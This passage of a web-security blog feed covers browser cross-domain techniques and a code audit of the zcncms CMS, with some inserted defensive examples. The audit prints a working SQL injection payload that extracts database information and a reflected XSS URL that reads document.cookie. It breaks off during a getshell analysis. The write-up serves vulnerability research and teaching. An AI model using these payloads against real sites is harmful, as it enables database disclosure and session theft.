<p>Requests is written in Python on top of urllib3 and inherits all of its features: HTTP keep-alive and connection pooling, session persistence with cookies, file uploads, automatic detection of the response body's encoding, and automatic encoding of international URLs and POST data. It is modern, international and human-friendly. Because it is so capable it is now widely used for crawlers and similar tasks, but when fetching Chinese web pages you will sooner or later run into encoding problems; this post discusses them.</p>
</summary>
<category term="编程之美" scheme="http://wps2015.org/categories/%E7%BC%96%E7%A8%8B%E4%B9%8B%E7%BE%8E/"/>
<category term="python" scheme="http://wps2015.org/tags/python/"/>
</entry>
<entry>
<title>A summary of cross-domain methods</title>
<link href="http://wps2015.org/2016/10/17/summary-of-cross-domain/"/>
<id>http://wps2015.org/2016/10/17/summary-of-cross-domain/</id>
<published>2016-10-16T16:00:00.000Z</published>
<updated>2017-03-22T01:27:33.276Z</updated>
<content type="html"><![CDATA[<p>最近面试问的挺多的一个问题,就是JavaScript的跨域问题。在这里,对跨域的一些方法做个总结。由于浏览器的同源策略,不同域名、不同端口、不同协议都会构成跨域;但在实际的业务中,很多场景需要进行跨域传递信息,这样就催生出多种跨域方法。<br><a id="more"></a></p>
<h3 id="1-具备src的标签"><a href="#1-具备src的标签" class="headerlink" title="1. 具备src的标签"></a>1. 具备src的标签</h3><ul>
<li>原理:所有具有<code>src</code>属性的HTML标签都是可以跨域的</li>
</ul>
<p>在浏览器中,<code><script></code>、<code><img></code>、<code><iframe></code>和<code><link></code>这几个标签是可以加载跨域(非同源)的资源的,并且加载的方式其实相当于一次普通的GET请求,唯一不同的是,为了安全起见,浏览器不允许这种方式下对加载到的资源的读写操作,而只能使用标签本身应当具备的能力(比如脚本执行、样式应用等等)。</p>
<h3 id="2-JSONP跨域"><a href="#2-JSONP跨域" class="headerlink" title="2. JSONP跨域"></a>2. JSONP跨域</h3><ul>
<li>原理:<code><script></code>是可以跨域的,而且在跨域脚本中可以直接回调当前脚本的函数</li>
</ul>
<p>script标签是可以加载异域的JavaScript并执行的,通过预先设定好的callback函数来实现和母页面的交互。它有一个大名,叫做JSONP跨域,JSONP是JSON with Padding的略称。它是一个非官方的协议,明明是加载script,为啥和JSON扯上关系呢?原来就是这个callback函数,对它的使用有一个典型的方式,就是通过JSON来传参,即将JSON数据填充进回调函数,这就是JSONP的JSON+Padding的含义。JSONP只支持GET请求。<br>前端代码:<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span> <span class="attr">type</span>=<span class="string">"text/javascript"</span>></span><span class="javascript"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">dosomething</span>(<span class="params">jsondata</span>)</span>{</span><br><span class="line"> <span class="comment">//处理获得的json数据</span></span><br><span class="line"> }</span><br><span class="line"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span> <span class="attr">src</span>=<span class="string">"http://haorooms.com/data.php?callback=dosomething"</span>></span><span class="undefined"></span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure></p>
<p>后台代码:<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$callback = $_GET[<span class="string">'callback'</span>];<span class="comment">//得到回调函数名</span></span><br><span class="line">$data = <span class="keyword">array</span>(<span class="string">'a'</span>,<span class="string">'b'</span>,<span class="string">'c'</span>);<span class="comment">//要返回的数据</span></span><br><span class="line"><span class="keyword">echo</span> $callback.<span class="string">'('</span>.json_encode($data).<span class="string">')'</span>;<span class="comment">//输出</span></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure></p>
<h3 id="3-跨域资源共享(CORS)"><a href="#3-跨域资源共享(CORS)" class="headerlink" title="3. 跨域资源共享(CORS)"></a>3. 跨域资源共享(CORS)</h3><ul>
<li>原理:服务器设置Access-Control-Allow-Origin HTTP响应头之后,浏览器将会允许跨域请求</li>
</ul>
<p>CORS是HTML5标准提出的跨域资源共享(Cross Origin Resource Share),支持GET、POST等所有HTTP请求。CORS需要服务器端设置<code>Access-Control-Allow-Origin</code>头,否则浏览器会因为安全策略拦截返回的信息。<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Access-Control-Allow-Origin: * # 允许所有域名访问,或者</span><br><span class="line">Access-Control-Allow-Origin: http://a.com # 只允许所有域名访问</span><br></pre></td></tr></table></figure></p>
<p>CORS又分为简单跨域和非简单跨域请求,有关CORS的详细介绍请看<code>阮一峰</code>的<a href="http://www.ruanyifeng.com/blog/2016/04/cors.html" target="_blank" rel="external">跨域资源共享 CORS 详解</a>,里面讲解的非常详细。</p>
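<p>Methods 2 and 3 both hinge on what the server writes back: the PHP snippet echoes <code>$_GET['callback']</code> verbatim, and the CORS header is shown as either <code>*</code> or one fixed origin. As an added example (not code from the original post, and server-side Python rather than PHP), the helpers below add the checks a server should make before doing either: the JSONP callback is restricted to a JavaScript identifier, and <code>Access-Control-Allow-Origin</code> is only ever set to an allow-listed origin, never reflected blindly and never <code>*</code> together with credentials. The allow-list and the data are constructed for the demo.</p>

```python
"""Server-side guards for the two server-configured cross-domain methods: JSONP and CORS."""
import json
import re

# Constructed allow-list standing in for the post's http://a.com.
ALLOWED_ORIGINS = {"http://a.com", "https://app.a.com"}

# A JavaScript identifier, optionally dotted (e.g. "jQuery.cb123"); anything else is rejected,
# so a callback parameter cannot smuggle extra script into the response.
_CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")


def jsonp_body(callback, data):
    """Build the same 'callback(json);' body the PHP snippet produces, but validate the name.

    Returns (status, content_type, body). json.dumps keeps non-ASCII escaped by default;
    escaping '<' as well means the JSON can never terminate the surrounding <script>.
    """
    if not callback or not _CALLBACK_RE.match(callback):
        return 400, "text/plain", "invalid callback"
    payload = json.dumps(data).replace("<", "\\u003c")
    return 200, "application/javascript", "%s(%s);" % (callback, payload)


def cors_headers(request_origin, allowed=ALLOWED_ORIGINS, with_credentials=False):
    """Return the CORS response headers for one request given its Origin header.

    The header names the exact requesting origin, and only if it is on the allow-list; an
    unknown origin gets no header at all, so the browser blocks the response. 'Vary: Origin'
    tells caches that the response differs per origin. Browsers reject
    'Access-Control-Allow-Credentials: true' combined with '*', which is why the credentialed
    case must go through this exact-origin path.
    """
    headers = {}
    if request_origin is None:
        return headers  # same-origin navigation or non-browser client: nothing to add
    if request_origin not in allowed:
        return headers
    headers["Access-Control-Allow-Origin"] = request_origin
    headers["Vary"] = "Origin"
    if with_credentials:
        headers["Access-Control-Allow-Credentials"] = "true"
    return headers


def public_cors_headers():
    """The '*' form from the post: appropriate only for data anyone may read, without cookies."""
    return {"Access-Control-Allow-Origin": "*"}


if __name__ == "__main__":
    print(jsonp_body("dosomething", ["a", "b", "c"]))
    print(jsonp_body("alert(1);//", ["a"]))
    print(cors_headers("http://a.com"))
    print(cors_headers("http://other.example"))
```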
<h3 id="4-document-domain"><a href="#4-document-domain" class="headerlink" title="4. document.domain"></a>4. document.domain</h3><ul>
<li>原理:相同主域名不同子域名下的页面,可以设置document.domain让它们同域</li>
</ul>
<p>我们只需要在跨域的两个页面中设置document.domain就可以了。修改document.domain的方法只适用于不同子域的框架间的交互,要载入iframe页面。<br>例如:1. 在页面 <a href="http://a.example.com/a.html" target="_blank" rel="external">http://a.example.com/a.html</a> 设置document.domain<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">iframe</span> <span class="attr">id</span> = <span class="string">"iframe"</span> <span class="attr">src</span>=<span class="string">"http://b.example.com/b.html"</span> <span class="attr">onload</span> = <span class="string">"test()"</span>></span><span class="tag"></<span class="name">iframe</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span> <span class="attr">type</span>=<span class="string">"text/javascript"</span>></span><span class="javascript"></span><br><span class="line"> <span class="built_in">document</span>.domain = <span class="string">'example.com'</span>;<span class="comment">//设置成主域</span></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">test</span>(<span class="params"></span>)</span>{</span><br><span class="line"> alert(<span class="built_in">document</span>.getElementById(<span class="string">'iframe'</span>).contentWindow);<span class="comment">//contentWindow 可取得子窗口的 window 对象</span></span><br><span class="line"> }</span><br><span class="line"></span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure></p>
<p>2、在页面http:// b.example.com/b.html 中设置document.domain<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span> <span class="attr">type</span>=<span class="string">"text/javascript"</span>></span><span class="javascript"></span><br><span class="line"> <span class="built_in">document</span>.domain = <span class="string">'example.com'</span>;<span class="comment">//在iframe载入这个页面也设置document.domain,使之与主页面的document.domain相同</span></span><br><span class="line"></span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure></p>
<h3 id="5-window-name"><a href="#5-window-name" class="headerlink" title="5. window.name"></a>5. window.name</h3><ul>
<li>原理:window对象有个name属性,该属性有个特征:即在一个窗口(window)的生命周期内,窗口载入的所有的页面都是共享一个window.name的,每个页面对window.name都有读写的权限,window.name是持久存在一个窗口载入过的所有页面中的。</li>
</ul>
<p>There are three pages here:</p>
<ul>
<li>sever.com/a.html, the page that holds the data</li>
<li>agent.com/b.html, the page that reads the data</li>
<li>agent.com/c.html, an empty page used as a proxy</li>
</ul>
<p>In a.html, set <code>window.name</code> to the value to be passed<br><figure class="highlight html"><pre><code>&lt;script&gt;
    window.name = 'I was there!';
    alert(window.name);
&lt;/script&gt;
</code></pre></figure></p>
<p>In b.html, once the iframe has loaded, point its <code>src</code> at the same-origin <code>c.html</code>; <code>iframe.contentWindow.name</code> then yields the value being passed<br><figure class="highlight html"><pre><code>&lt;body&gt;
    &lt;script type="text/javascript"&gt;
        var iframe = document.createElement('iframe');
        iframe.style.display = 'none';
        var state = 0;
        iframe.onload = function() {
            if(state === 1) {
                // a.html stored a plain string; use JSON.parse(...) here only if the sender stored JSON
                var data = iframe.contentWindow.name;
                alert(data);
                iframe.contentWindow.document.write('');
                iframe.contentWindow.close();
                document.body.removeChild(iframe);
            } else if(state === 0) {
                state = 1;
                iframe.contentWindow.location = 'http://agent.com/c.html';
            }
        };
        iframe.src = 'http://sever.com/a.html';
        document.body.appendChild(iframe);
    &lt;/script&gt;
&lt;/body&gt;
</code></pre></figure></p>
<p>The cross-origin data is read successfully, as shown:<br><img src="https://img.alicdn.com/imgextra/i3/792076116/TB2HXEBXk1M.eBjSZFOXXc0rFXa_!!792076116.png" alt=""></p>
<h3 id="6-window-postMesage"><a href="#6-window-postMesage" class="headerlink" title="6. window.postMesage"></a>6. window.postMesage</h3><ul>
<li>原理: HTML5新增的postMessage方法,通过postMessage来传递信息,对方可以通过监听message事件来监听信息。可跨主域名及双向跨域。</li>
</ul>
<p>这里有两个页面:</p>
<ol>
<li>agent.com/index.html</li>
<li>server.com/remote.html</li>
</ol>
<p>Local code, index.html<br><figure class="highlight html"><pre><code>&lt;body&gt;
    &lt;iframe id="proxy" src="http://server.com/remote.html" onload="postMsg()" style="display: none"&gt;&lt;/iframe&gt;
    &lt;script type="text/javascript"&gt;
        var obj = {
            msg: 'hello world'
        }
        function postMsg(){
            var iframe = document.getElementById('proxy');
            var win = iframe.contentWindow;
            win.postMessage(obj,'http://server.com');
        }
    &lt;/script&gt;
&lt;/body&gt;
</code></pre></figure></p>
<p>Usage of <code>postMessage</code>: otherWindow.postMessage(message, targetOrigin);</p>
<ul>
<li>otherWindow: the target window, i.e. the window the message is sent to; a member of window.frames or a window created by window.open</li>
<li>message: the message to send; a String or an Object (IE8 and IE9 do not support objects)</li>
<li>targetOrigin: restricts which origin may receive the message; use '*' for no restriction</li>
</ul>
<p>remote.html on server.com listens for the <code>message</code> event and checks that the sender is the origin it intends to talk to.<br><figure class="highlight plain"><pre><code>&lt;head&gt;
    &lt;title&gt;&lt;/title&gt;
    &lt;script type="text/javascript"&gt;
        window.onmessage = function(e){
            if(e.origin !== 'http://localhost:8088') return;
            alert(e.data.msg+" from "+e.origin);
        }
    &lt;/script&gt;
&lt;/head&gt;
</code></pre></figure></p>
<p><img src="https://img.alicdn.com/imgextra/i3/792076116/TB2nrneXCmK.eBjSZPfXXce2pXa_!!792076116.png" alt=""></p>
<h3 id="7-location-hash"><a href="#7-location-hash" class="headerlink" title="7. location.hash"></a>7. location.hash</h3><p>原理:</p>
<ul>
<li>这个办法比较绕,但是可以解决完全跨域情况下的脚步置换问题。原理是利用location.hash来进行传值。www.a.com下的a.html想和www.b.com下的b.html通信(在a.html中动态创建一个b.html的iframe来发送请求)</li>
<li>但是由于“同源策略”的限制他们无法进行交流(b.html无法返回数据),于是就找个中间人:www.a.com下的c.html(注意是www.a.com下的)。</li>
<li>b.html将数据传给c.html(b.html中创建c.html的iframe),由于c.html和a.html同源,于是可通过c.html将返回的数据传回给a.html,从而达到跨域的效果。</li>
</ul>
<p><img src="https://img.alicdn.com/imgextra/i4/792076116/TB23US2XM1J.eBjy0FaXXaXeVXa_!!792076116.jpg" alt=""><br>a.html代码如下:<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="javascript"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">startRequest</span>(<span class="params"></span>)</span>{ </span><br><span class="line"> <span class="keyword">var</span> ifr = <span class="built_in">document</span>.createElement(<span class="string">'iframe'</span>); </span><br><span class="line"> ifr.style.display = <span class="string">'none'</span>; </span><br><span class="line"> ifr.src = <span class="string">'http://www.b.com/b.html#sayHi'</span>; <span class="comment">//传递的location.hash </span></span><br><span class="line"> <span class="built_in">document</span>.body.appendChild(ifr); </span><br><span class="line">} </span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkHash</span>(<span class="params"></span>) </span>{ </span><br><span class="line"> <span class="keyword">try</span> { </span><br><span class="line"> <span class="keyword">var</span> data = location.hash ? 
location.hash.substring(<span class="number">1</span>) : <span class="string">''</span>; </span><br><span class="line"> <span class="keyword">if</span> (<span class="built_in">console</span>.log) { </span><br><span class="line"> <span class="built_in">console</span>.log(<span class="string">'Now the data is '</span>+data); </span><br><span class="line"> } </span><br><span class="line"> } <span class="keyword">catch</span>(e) {}; </span><br><span class="line">} </span><br><span class="line">setInterval(checkHash, <span class="number">2000</span>); </span><br><span class="line"><span class="built_in">window</span>.onload = startRequest;</span><br><span class="line"></span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure></p>
<p>b.html code:<br><figure class="highlight html"><pre><code>&lt;script&gt;
function checkHash(){
    var data = '';
    // simulate a simple parameter-handling step
    switch(location.hash){
        case '#sayHello': data = 'HelloWorld';break;
        case '#sayHi': data = 'HiWorld';break;
        default: break;
    }
    data &amp;&amp; callBack('#'+data);
}
function callBack(hash){
    // IE and Chrome's security model does not allow modifying parent.location.hash, so a proxy iframe under www.a.com is used
    var proxy = document.createElement('iframe');
    proxy.style.display = 'none';
    proxy.src = 'http://localhost:8088/proxy.html'+hash;  // note: this file lives under www.a.com
    document.body.appendChild(proxy);
}
window.onload = checkHash;
&lt;/script&gt;
</code></pre></figure></p>
<p>Because the two pages are not under the same domain, IE and Chrome do not allow changing the value of parent.location.hash, so a proxy iframe under the a.com domain is needed; here that is a proxy file c.html under a.com. Firefox allows the change directly.<br>The code of c.html is as follows:<br><figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="undefined">parent.parent.location.hash = self.location.hash.substring(1); </span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure></p>
<p>Open a.html directly: a.html sends the message "sayHi" to b.html; b.html inspects the message, returns "HiWorld", and changes the value of location.hash through c.html.<br><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2ao3jXNeK.eBjSZFlXXaywXXa_!!792076116.png" alt=""></p>
<h3 id="8-flash-URLLoader"><a href="#8-flash-URLLoader" class="headerlink" title="8. flash URLLoader"></a>8. flash URLLoader</h3><p>Flash has its own security policy: a server can declare, through a crossdomain.xml file, which domains' SWF files may access it, and a SWF can also determine through the API which domains' SWF files may load it. When accessing resources across domains, for example requesting data on google.com from baidu.com, Flash can be used to send the HTTP request. First, edit crossdomain.xml on google.com (usually kept in the web root; create it manually if it does not exist) and add baidu.com to the whitelist. Next, send the HTTP request via the Flash URLLoader, and finally pass the response to JavaScript through the Flash API. Flash URLLoader is a very common cross-domain solution, but it is not viable if iOS has to be supported.</p>
<h4 id="小结"><a href="#小结" class="headerlink" title="小结"></a>Summary</h4><p>In summary, the common cross-domain techniques are those listed above; each business scenario has a cross-domain method that suits it. Cross-domain communication solves some hard problems of resource sharing and information exchange, but some of the techniques can introduce security problems: JSONP can enable watering-hole attacks, and tags such as <code><img></code> can be used for XSS or CSRF attacks. So wherever cross-domain techniques are applied, pay particular attention to security.</p>
]]></content>
<summary type="html">
<p>A question that has come up a lot in interviews recently is JavaScript's cross-domain problem. Here I summarise some cross-domain methods. Because of the browser's same-origin policy, a different domain name, port or protocol each constitutes a cross-domain case; but in real business many scenarios need to pass information across domains, which has given rise to a variety of cross-domain methods.<br>
</summary>
<category term="Web安全" scheme="http://wps2015.org/categories/Web%E5%AE%89%E5%85%A8/"/>
<category term="javascript" scheme="http://wps2015.org/tags/javascript/"/>
</entry>
<entry>
<title>Code audit: a collection of zcncms vulnerabilities (II)</title>
<link href="http://wps2015.org/2016/08/09/code-audit-of-zcncms2/"/>
<id>http://wps2015.org/2016/08/09/code-audit-of-zcncms2/</id>
<published>2016-08-08T16:00:00.000Z</published>
<updated>2016-08-10T06:49:42.416Z</updated>
<content type="html"><![CDATA[<p>Following the previous post <a href="http://wps2015.org/2016/08/05/code%20audit%20of%20zcncms/">Code audit: zcncms backend SQL injection (I)</a>, this one continues to dig out several more zcncms vulnerabilities.<a id="more"></a></p>
<h4 id="后台SQL注入"><a href="#后台SQL注入" class="headerlink" title="后台SQL注入"></a>Backend SQL injection</h4><p>After the improperly handled $parentid parameter of the previous post, in /module/products/admincontroller/products_photo.php:<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">switch</span>($a)</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">case</span> <span class="string">'list'</span>:<span class="keyword">default</span>:<span class="comment">//list</span></span><br><span class="line"> <span class="comment">// list</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">empty</span>($productid)) {</span><br><span class="line"> $where = <span class="string">' 1 = 1 '</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $where = <span class="string">" productid = '"</span>.$productid.<span class="string">"' "</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> $pageListNum=<span class="number">12</span>;<span class="comment">// items per page</span></span><br><span class="line"> $totalPage=<span class="number">0</span>;<span class="comment">// total pages</span></span><br><span class="line">----------------------------------------------------------------------</span><br><span class="line"><span class="keyword">case</span> <span class="string">'edit'</span>:<span class="comment">//</span></span><br><span class="line"> <span class="keyword">if</span>(<span class="keyword">isset</span>($submit)){</span><br><span class="line"> $info = <span class="keyword">array</span>();</span><br><span class="line"> $time = time();</span><br><span class="line"> <span class="keyword">if</span>(<span class="keyword">isset</span>($id)){</span><br><span class="line"> $id = intval($id);</span><br><span class="line"> <span class="keyword">if</span>($id <= <span class="number">0</span>){</span><br><span class="line"> errorinfo(<span class="string">'变量错误'</span>,<span class="string">''</span>);</span><br><span class="line"> }</span><br><span class="line"> $infoold = $products_photo->GetInfo(<span class="string">''</span>,<span class="string">' id = '</span>.$id); </span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> $productinfo = $products->GetInfo(<span class="string">''</span>,<span class="string">' id = '</span>.$productid);</span><br><span class="line"> <span class="comment">//20120719</span></span><br><span class="line"> checkClassPower(<span class="string">'products'</span>,$productinfo[<span class="string">'classid'</span>]);</span><br></pre></td></tr></table></figure></p>
<p>When $a is 'list', <code>$where = " productid = '".$productid."' "</code>: $productid is enclosed in single quotes and every incoming parameter has been through addslashes, so this branch is safe. But when $a == 'edit', <code>$products->GetInfo('',' id = '.$productid)</code> concatenates $productid directly into the where clause without single quotes, which leads to SQL injection. The payload is constructed as follows:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">http://127.0.0.1:8088/code_audit/zcncms/admin/?c=products_photo&a=edit&id=7</span><br><span class="line">POST:</span><br><span class="line">submit=&productid=12=@`\\\'` and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1));#@`\\\'`</span><br></pre></td></tr></table></figure></p>
<p><img src="https://img.alicdn.com/imgextra/i1/792076116/TB2xsvmuXXXXXcTXpXXXXXXXXXX_!!792076116.png" alt=""></p>
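<p>The following is an added example, not code from zcncms or from this post: it runs the two where-clause shapes above against an in-memory SQLite table (the table name products_photo and its columns are assumed) to show why only the unquoted one is injectable, and the hardened lookup a fix would use.</p>

```php
<?php
// Added example, not zcncms code: the two where-clause shapes from
// products_photo.php side by side, run against an in-memory SQLite table
// (assumed schema: products_photo(id, productid, title)), plus a hardened lookup.
declare(strict_types=1);

function demoDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE products_photo (id INTEGER PRIMARY KEY, productid INTEGER, title TEXT)');
    $db->exec("INSERT INTO products_photo VALUES (7, 12, 'photo of item 12'), (8, 99, 'photo of item 99')");
    return $db;
}

// Every request value in zcncms arrives through _GetRequest(), which applies addslashes().
function requestValue(string $raw): string
{
    return addslashes($raw);
}

// 'list' branch: the value sits inside single quotes, so addslashes() keeps it a literal.
function listWhere(string $productid): string
{
    return " productid = '" . $productid . "' ";
}

// 'edit' branch: the value is concatenated bare; addslashes() has nothing to escape.
function editWhere(string $id): string
{
    return ' id = ' . $id;
}

function rowsWhere(PDO $db, string $where): array
{
    return $db->query('SELECT id, title FROM products_photo WHERE ' . $where)
              ->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened lookup: numeric ids are validated as such and bound as parameters,
// so the query text never contains request data at all.
function rowById(PDO $db, string $id): ?array
{
    if (!preg_match('/^[1-9][0-9]*$/', $id)) {
        return null;                        // zcncms would call errorinfo() here
    }
    $stmt = $db->prepare('SELECT id, title FROM products_photo WHERE id = :id');
    $stmt->execute([':id' => (int) $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function check(bool $ok, string $what): void
{
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

$db   = demoDb();
$bare = requestValue('7 or 1=1');   // constructed input: no quotes, so addslashes() is a no-op

// Quoted form: the whole string is compared as one literal and matches nothing.
check(count(rowsWhere($db, listWhere($bare))) === 0, 'quoted value stays a literal');
// Unquoted form: the tail becomes part of the SQL and every row comes back.
check(count(rowsWhere($db, editWhere($bare))) === 2, 'bare value is parsed as SQL');
// Hardened form: the same input is rejected before any query is built.
check(rowById($db, $bare) === null, 'non-numeric id rejected');
check(rowById($db, '7')['title'] === 'photo of item 12', 'valid id still works');
echo "all checks passed\n";
```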
<h4 id="反射型xss"><a href="#反射型xss" class="headerlink" title="反射型xss"></a>Reflected XSS</h4><p>In the backend login file /include/admincontroller/login.php, after checking whether the login succeeded, the template file is set to 'login.tpl.php':<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line">header(<span class="string">"location:./"</span>);</span><br><span class="line"><span class="keyword">exit</span>;</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line"><span class="comment">//echo 1;</span></span><br><span class="line">$loginerror = <span class="string">'用户名密码错误,请重新登陆.'</span>;</span><br><span class="line">$templatefile = <span class="string">'login.tpl.php'</span>;</span><br><span class="line">}</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line">$templatefile = <span class="string">'login.tpl.php'</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<p>Following it to /admin/templates/default/login.tpl.php:<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><meta http-equiv=<span class="string">"Content-Type"</span> content=<span class="string">"text/html; charset=utf-8"</span> /></span><br><span class="line"><title></span><br><span class="line"><span class="meta"><?php</span> <span class="keyword">if</span>(!<span class="keyword">empty</span>($topTitle)) <span class="keyword">echo</span> $topTitle.<span class="string">'-'</span>;<span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span> <span class="keyword">echo</span> $sys[<span class="string">'indextitle'</span>]; <span class="meta">?></span>-<span class="meta"><?php</span> <span class="keyword">echo</span> $pagetitle;<span class="meta">?></span></title></span><br><span class="line"><meta name=<span class="string">"keywords"</span> content=<span class="string">"<?php echo $sys['webkeywords']; ?>"</span>></span><br><span class="line"><meta name=<span class="string">"description"</span> content=<span class="string">"<?php echo $sys['webdescription']; ?>"</span>></span><br></pre></td></tr></table></figure></p>
<p>Inside the <code><title></code> tag three variables are echoed, one of them after checking whether $topTitle is empty. In the controller file login.php there is no definition or initialisation of $topTitle, and because of the parameter-registration behaviour seen earlier, it can be set through variable overwriting.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:8088/code_audit/zcncms/admin/?c=login&topTitle=</title><script>alert(document.cookie)</script></span><br></pre></td></tr></table></figure>
<p><img src="https://img.alicdn.com/imgextra/i2/792076116/TB2ufnWuXXXXXbmXXXXXXXXXXXX_!!792076116.png" alt=""></p>
<h4 id="后台getshell"><a href="#后台getshell" class="headerlink" title="后台getshell"></a>Backend getshell</h4><p>In the file /include/admincontroller/sys.php:<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line">$pagetitle = <span class="string">'基本信息'</span>;</span><br><span class="line">$pagepower = <span class="string">'sys'</span>;</span><br><span class="line"><span class="comment">// basic part</span></span><br><span class="line"><span class="keyword">require</span>(<span class="string">'checkpower.inc.php'</span>);</span><br><span class="line"><span class="comment">// feature part</span></span><br><span class="line"><span class="keyword">include_once</span>(WEB_INC.<span class="string">'file.class.php'</span>);</span><br><span class="line"><span class="keyword">include_once</span>(WEB_INC.<span class="string">'string.class.php'</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($submit)){</span><br><span class="line"> $FS = <span class="keyword">new</span> files();</span><br><span class="line"> $STR = <span class="keyword">new</span> C_STRING();</span><br><span class="line"> $info = <span class="keyword">array</span>(</span><br><span class="line"> <span class="string">'isclose'</span> => $isclose,</span><br><span class="line"> <span class="string">'closeinfo'</span> => $closeinfo,</span><br><span class="line"> <span class="string">'webtitle'</span> => $webtitle,</span><br><span class="line"> <span class="string">'indextitle'</span> => $indextitle,</span><br><span class="line"> <span class="string">'webkeywords'</span> => $webkeywords,</span><br><span class="line"> <span class="string">'webdescription'</span> => $webdescription,</span><br><span class="line"> <span class="string">'webcopyright'</span> => $webcopyright,</span><br><span class="line"> <span class="string">'webbeian'</span> => $webbeian,</span><br><span class="line"> <span class="string">'systemplates'</span> => $systemplates,</span><br><span class="line"> <span class="string">'linkurlmode'</span> => $linkurlmode,</span><br><span class="line"> );</span><br><span class="line"> $rs_msg = $STR->safe($info);</span><br><span class="line"> <span class="keyword">if</span>($FS->file_Write($rs_msg, WEB_INC.<span class="string">'sys.inc.php'</span>, <span class="string">'sys'</span>)) {</span><br><span class="line"> errorInfo(<span class="string">'编辑成功'</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> errorInfo();</span><br></pre></td></tr></table></figure></p>
<p>The site's basic information can be edited and is stored in sys.inc.php, but $info first passes through the safe function in <code>$rs_msg = $STR->safe($info);</code>. Following the safe function:<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">safe</span><span class="params">($msg)</span></span><br><span class="line"> </span>{</span><br><span class="line"> <span class="keyword">if</span>(!$msg && $msg != <span class="string">'0'</span>)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span>(is_array($msg))</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">foreach</span>($msg <span class="keyword">AS</span> $key=>$value)</span><br><span class="line"> {</span><br><span class="line"> $msg[$key] = $this->safe($value);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> $msg = trim($msg);</span><br><span class="line"> <span class="comment">//$old = array("&amp;","&nbsp;","'",'"',"\t","\r");</span></span><br><span class="line"> <span class="comment">//$new = array("&"," ","&#39;","&quot;","&nbsp; &nbsp; ","");</span></span><br><span class="line"> $old = <span class="keyword">array</span>(<span class="string">"&amp;"</span>,<span class="string">"&nbsp;"</span>,<span 